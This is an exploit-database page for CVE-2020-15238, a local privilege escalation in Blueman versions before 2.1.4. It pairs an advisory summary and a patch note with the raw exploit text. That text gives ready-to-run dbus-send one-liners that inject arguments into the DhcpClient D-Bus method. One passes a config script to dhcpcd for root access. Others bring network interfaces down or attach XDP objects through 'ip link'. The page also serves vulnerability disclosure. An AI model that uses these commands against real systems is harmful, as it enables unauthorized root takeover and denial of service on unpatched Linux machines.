header-logo
Suggest Exploit
vendor:
blueman
by:
Vaisha Bernard
7.0
CVSS
HIGH
Argument Injection
78
CWE
Product Name: blueman
Affected Version From: < 2.1.4
Affected Version To: < 2.1.4
Patch Exists: YES
Related CWE: CVE-2020-15238
CPE: 2.3:a:blueman-project:blueman:*:*:*:*:*:*:*
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2020-15238/https://www.rapid7.com/db/vulnerabilities/suse-cve-2020-15238/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2020-15238/https://www.rapid7.com/db/vulnerabilities/debian-cve-2020-15238/
Other Scripts: N/A
Platforms Tested: Ubuntu 20.04, Ubuntu 16.04 - 20.10, Debian 9 - 11
2020

Local Privilege Escalation in Blueman < 2.1.4

The DhcpClient method of the d-bus interface to blueman-mechanism is prone to an argument injection vulnerability. On systems where the isc-dhcp-client package is removed and the dhcpcd package installed, this leads to Local Privilege Escalation to root from any unprivileged user. Also on default installations with isc-dhcp-client installed, this can lead to DoS attacks by bringing any interface down or allows users to attach XDP objects to an interface.

Mitigation:

Update to Blueman version 2.1.4 or later.
Source

Exploit-DB raw data:

# Exploit Title: Local Privilege Escalation in Blueman < 2.1.4
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://github.com/blueman-project/blueman
# Software Link: https://github.com/blueman-project/blueman
# Version: < 2.1.4
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-15238
#
# By default installed on Ubuntu 16.04 - 20.10 and
# Debian 9 - 11
#
# Local root exploit when dhcpcd is used instead of dhclient
# 
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# 
# The DhcpClient method of the d-bus interface to blueman-mechanism 
# is prone to an argument injection vulnerability. 
# On systems where the isc-dhcp-client package is removed 
# and the dhcpcd package installed, this leads to Local 
# Privilege Escalation to root from any unprivileged user. 
# See attached python script for a working exploit. Or use 
# this oneliner with a shellscript "/tmp/eye":
 
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"-c/tmp/eye"

# This happens because the argument is not sanitized before 
# being used as an argument to dhcpcd.
# 
# Also on default installations with isc-dhcp-client installed, 
# this can lead to DoS attacks by bringing any interface down 
# as follows:

dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"

# Or allows users to attach XDP objects to an interface:

dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 down al"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"ens33 name a"
dbus-send --print-reply --system --dest=org.blueman.Mechanism \
/org/blueman/mechanism org.blueman.Mechanism.DhcpClient \
string:"a xdp o /tmp/o"

# This both happens because the argument is passed to "ip link" 
# unsanitized.

Navigation

Suggest Exploit

Services By CQR